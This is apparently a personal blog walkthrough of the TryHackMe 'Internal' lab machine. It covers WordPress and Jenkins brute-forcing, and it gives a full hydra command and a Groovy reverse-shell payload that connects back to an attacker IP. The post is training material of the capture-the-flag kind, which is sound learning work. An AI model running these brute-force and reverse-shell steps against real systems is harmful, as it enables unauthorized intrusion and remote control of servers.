Internal is the hard rated challenge on tryhackme.I was following offensive pentesting path and found this machine and since this was rated as hard, I thought of writing blog on this. I hope we will learn together a lot into the rabbit hole of penetration testing. Let’s hack into the machine and give them a pentest report.

image

Enumeration (Recon is everything)

They gave us an ip to start. This ip may change while going down this blog because it may take more time to solve and I only give short time at once and come back later along with my notes. For now let’s do initial scan with our favourite tool Nmap. I did all port scanning with nmap to find any interesting port and while nmap is running, i usually run rustcan(a fast port scanning tool written in rust language). I only found 2 ports opened ie. 22 and 80.

image

Bumping around website

image

What?? Nothing more than a default apache web server page? Okay, fine. Let me find some directories then. Let’s run feroxbuster(bruteforcing tool written in python) to see if we can find any directories.

image

Ahhh, wordpress site. Why would the developer put much effort to build the useless site? They thought why not use wordpress instead. When i view the /wordpress site, i found it’s broken. It just sucks, doesn’t it? Did you liked this page?

image

Let’s skip to to the internal and we got lost. image

Here, it comes the /etc/hosts file. We need to add the domain name to resolve the domain name’s ip address. We just need to inform our local dns server to find the ip address for the domain name internal.thm You know what to do right? Just add these line to /etc/hosts file and your local dns is ready to serve the internal.thm

10.10.135.111  internal.thm

Let’s get back to our broken wordpress site and seee what it looks like. Ahh, look, it found it’s beauty now.

image

Now what?? I prefer to begin with inital recon on wordpress ie. running wpscan to find out any initial foothold. We may find some username enumeration and try to bruteforce the credentials. Just throw the website into the wpscan and let it do it’s job.

image

No username and interesting plugins is found by wpscan. Wordpress seems so old and old means insecure?? I searched for vulnerable wordpress version on the public exploit databases and google but that lead me to nowhere.

image

There was only one option left and that was hitting bruteforce attack on the admin account and yeah we found the password for admin account. We got our initial foothold. You can run the command as below in wpscan to get the password for admin. I won’t disclose the actual password here.

image

After roaming around the admin panel inside the wordpress, i found a private page with some credentials but don’t know what to do with it for now.

image

Now, we are left to get reverse shell to the server. We know that twentyseventeen theme is being used and this theme contains 404.php page that we can abuse to gain our reverse shell. Edit the page with php reverse shell payload from penetestmonkey or your favourite one(mine is pentestmonkey). Don’t forget to align ip and port as in your netcat listener

image

We need some method to execute this php page and get the connection back and we can do that by visiting the 404 page manually. The url is http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php but don’t forget to start the listener in your machine before executing or visiting the url. There we are on the machine.

image

Initial Privilege Escalation

You can install linpeas on the machine but you won’t be finding anything useful information. This machine is totally manual enumeration. I spent almost 30min trying to findout anything useful, tried finding the files that are owned by the root, www-data but there is nothing. While listing all the processes running on the machine (netstat -tuna), one script caught my attention but couldn’t move forward. This jenkins.sh is something but we don’t have permission to view this file.

image

After some enumeration on file system, i move to /opt folder and found another interesting file and note.

image

We got some credentials but have no idea where to throw this credentials. Why don’t we try ssh using this credentials?? Let’s give it a try and guess what, we logged on to the machine as Aubreanna user. We got upgraded to one level privilege up.

image

Collect the first user flag. You can find it in the home directory as user.txt. On jenkins.txt note, we know that the jenkins service is running on with different ip ie.there is docker service running. That jenkins.sh maybe something related to this docker service.

image

What is Jenkins??

Jenkins is open source automation service that greatly helps developer in automating day to day redundant workflow. Basically jenkins is CI/CD pipelining where we write scripts that does automation for: Whenever the code changes or some event occurs then the remote code is integrated from bitbucket or gitlab, build it with local one and deploy or deliver it to the remote server.

Since jenkins run on web server, we can enumerate the jenkins using curl command line like this

image

But…… this isn’t the great way to do so. What can we do then? We can’t directly view that ip and port in our local machine. So, there is an way called ssh port forwarding. Using this technique, we can access that service locally on our machine.

SSH Port Forwarding and Jenkins Exploitation

We can tunnel our local port to connect to the remote ip and port. That’s what ssh local port forwarding means. We can create a local port forwarding tunnel from port 8080 on our local machine to port 8080 on the remote machine with the IP address 172.17.0.2 through an SSH connection to the server at IP address 10.10.157.57 using the username “aubreanna” like this. ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.81.208

If this bounces your head, then ssh local port forwarding simply forwards every traffic that you send on your localhost port say 8080 to the remote server port that you specify on the above command ie.8080 and the ip is the IP address of the remote machine that you want to forward your localhost traffic to. That means when you send request to localhost:8080, ssh tunneling will forward that request to remote server and sends back the response to your localhost at port 8080

Now, we can view the page locally on our machine.

image

The jenkins page loads up locally. COOL!!

image

I tried some default credentials for the jenkins server: admin:password but this didn’t worked for me. Why not give a shot to bruteforce using hydra tool? I quickly ran the tool and it found me the password within few seconds. You can run the tool as below. Notice that i used the ip as samsec because i changed the dns for localhost to samsec so that i can intercept the traffic using brupsuite(burpsuite won’t capture domain name being localhost). PS. This is unncessary.

hydra -l admin -P /usr/share/wordlists/rockyou.txt samsec -s 8081 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

image

After logging in using this credentials, we can enter to the jenkins. One special function of jenkins is that it contains /script directory where we can run arbitrary java code. By leveraging this function, we can abuse code execution to get reverse shell to the docker machine that runs this jenkins. After digging around in google to find the rev shell payload, i found one in medium article.

String host="10.10.117.223";
int port=4444;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Make sure to change the ip, port to yours that netcat is listening on. You need to insert this payload in the script console in jenkins and run the payload after setting up listener in local machine. Finally we got the reverse shell connection like this.

image

image

Verify that we are inside docker using ls -al and you should see .dockerenv file. There is nothing in /home folder and after little while, i decided to look into opt folder and found one note with credentials somewhere.

image

Yayyy, we found the credentials for root and now one ssh connection is left to grab the root flag. I hope you can do that easily.

End

This challenge was more of a bruteforcing than logical escaping and exploitation. I was not aware of bruteforcing wordpress and jenkins at first glance. This may feel some overwhelming because of some ssh tunneling issues but at the end learning something new is what we should seek for in cybersec.